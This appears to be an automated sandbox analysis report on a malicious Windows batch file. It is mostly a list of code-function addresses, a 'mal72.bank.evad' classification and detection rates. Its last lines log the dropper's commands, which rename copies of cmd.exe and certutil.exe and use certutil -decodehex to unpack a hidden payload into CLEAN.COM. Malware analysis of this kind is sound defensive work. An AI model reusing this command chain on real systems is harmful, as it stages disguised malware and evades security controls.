Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB174A30
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB178DF8
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB17CE10
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB1837D8
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB180A6C
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB17AA54
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB185554
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB184224
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB172C48
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB187854
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB19AC4C
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB171884
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB17B0D8
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB1818D4
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB177D30
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB178510
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB175B70
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB179B50
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB173F90
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB176BE0
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB19AFBC
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB173410
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB175240
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB177650
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB17D250
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB179E50
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB17E680
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB19EE88
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB176EE4
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB17372C
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB197F00
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB1A1538
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB19D9D0
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB1781D4
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB172220
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB19AA30
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB174A30
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB178DF8
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB17CE10
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD87BC10
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8A3800
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD87F020
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7A2F38
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD87CCB8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD87C120
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7EDEA4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD81DEB0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7E1ED0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD819EE4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD825F04
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD821E2C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD81BE70
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD82BDA0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7A1DE8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7C5DF7
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7CDD20
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD847D70
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7F1D70
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7E9D6C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD89DD84
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7FC0B8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7F8018
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7C8080
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD862084
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD849FF8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD791F80
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7A7AB4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7F7AC8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD80BA48
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7C3A40
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7E1A60
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD849A58
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8119AC
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7BF9B8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD791A10
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD88994C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD887938
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD81F990
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7ABCA4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7C9CD0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD859CC0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7EBCE8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7A5D08
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7CFC20
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7EFC34
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7E3C60
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD89FC90
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD811C90
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD795BA4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7B9BC8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7FDBF0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD843C10
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD85BB28
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD83FB50
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD827B74
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD801B84
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD79FB84
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7E76B0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD84D6A0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD81F6D8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD86D6DC
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD873638
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7D5648
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7BD660
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD865660
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD847678
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD877678
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7F55F0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD79F610
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8195FC
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD80F520
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7C156C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7CB58C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD869580
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7E58CC
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7B1830
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD843820
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD82184C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD863874
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD82D858
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7F7890
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7D17D4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8077C8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7FD7F0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7AF800
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD813760
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7E9790
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7AB788
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD86D2B4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD79F2C0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7F92C4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7ED2C0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8092D8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD845290
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7AD1B8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7E11C8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7E31E0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD85511C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD81F168
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7B54A0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8894A8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8614F0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7DF434
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7DD440
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD795438
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD83D460
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD849494
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7F7478
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD87B3AC
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8933D4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8833D0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7973F8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD80D410
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD825318
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7C7340
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7BB36C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD878EAC
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7CEED4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD796EF4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD874E58
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7BEDA4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7F2D18
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7E8D2C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD872D6C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD806D7C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7AB09C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD791030
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7D107C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7ED094
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7B8F1C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD834F94
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7C4F90
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD864A40
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD87AA58
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD884A58
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD81EA7C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD816A84
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD86A9F0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7FE9F0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7F09EC
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD81AA00
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD792940
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7F6984
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7E8990
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD82CCA8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD888CF4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7A8D00
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD822CF8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7ECD10
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7E0C28
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD868C58
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD89CC8C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD80CC80
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD808BD4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7DCBFC
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD79AC08
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7E4B30
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7B4B68
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD846B94
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7FC6D0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD80C6F8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD85C630
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7F8630
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8885A8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7A05E0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8985EC
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD79C520
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD864538
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7F655C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7C8570
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7E2580
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD82E57C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8708C8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8748C4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD882854
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD81E844
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8127D0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8407D0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD81C7F0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD886750
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7EE29C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD85821C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD874274
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD806280
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7B227C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7EC1D0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD81A1E8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8A41F8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7B0140
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD798170
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7D64A8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8024D4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7A44E0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD81E4F0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8784D8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8A842F
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD79A424
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD87E430
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD80A450
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD80C450
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD828488
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7E8484
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD870490
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7DE3A0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7F0398
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8243D0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD818414
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7B4410
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD87234C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD826374
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB187854
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB1837D8
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB173410
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB17AA54
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB185554
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB178DF8
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB172C48
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB19AC4C
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB171884
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB17B0D8
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB1818D4
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB177D30
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB178510
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB175B70
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB179B50
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB173F90
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB176BE0
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB19AFBC
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB180A6C
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB175240
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB177650
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB17D250
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB179E50
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB17E680
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB19EE88
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB176EE4
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB17372C
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB197F00
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB1A1538
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB19D9D0
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB1781D4
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB184224
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB172220
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB19AA30
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB174A30
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB17CE10
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB187854
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB1837D8
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB173410
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB17AA54
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB185554
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB178DF8
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB172C48
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB19AC4C
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB171884
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB17B0D8
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB1818D4
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB177D30
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB178510
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB175B70
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB179B50
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB173F90
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB176BE0
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB19AFBC
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB180A6C
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB175240
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB177650
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB17D250
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB179E50
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB17E680
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB19EE88
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB176EE4
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB17372C
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB197F0011_2_00007FF6EB197F00
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB1A153811_2_00007FF6EB1A1538
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB19D9D011_2_00007FF6EB19D9D0
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB1781D411_2_00007FF6EB1781D4
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB18422411_2_00007FF6EB184224
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB17222011_2_00007FF6EB172220
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB19AA3011_2_00007FF6EB19AA30
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB174A3011_2_00007FF6EB174A30
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB17CE1011_2_00007FF6EB17CE10
Source: C:\Users\Public\alpha.exe | Code function: String function: 00007FF6EB18498C appears 40 times
Source: C:\Users\Public\alpha.exe | Code function: String function: 00007FF6EB18081C appears 36 times
Source: C:\Users\Public\alpha.exe | Code function: String function: 00007FF6EB183448 appears 72 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF7FD89F11C appears 37 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF7FD89F1B8 appears 183 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF7FD857BAC appears 34 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF7FD82EB98 appears 93 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF7FD8A64A6 appears 173 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF7FD857D70 appears 35 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF7FD79D1C8 appears 41 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF7FD850D10 appears 181 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF7FD7CBC9C appears 280 times
Source: C:\Users\Public\kn.exe | Code function: String function: 00007FF7FD84ABFC appears 818 times
Source: classification engine | Classification label: mal72.bank.evad.winCMD@20/10@0/0
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB1732B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD87826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB19FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7D7EC0 CoCreateInstance,#357,#207,LocalFree,LocalFree
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8A3148 FindResourceExW,LoadResource
Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\alpha.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
Source: C:\Windows\System32\extrac32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Xirnkxhvuzwepe.cmd | ReversingLabs: Detection: 29%
Source: Xirnkxhvuzwepe.cmd | Virustotal: Detection: 12%
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 10
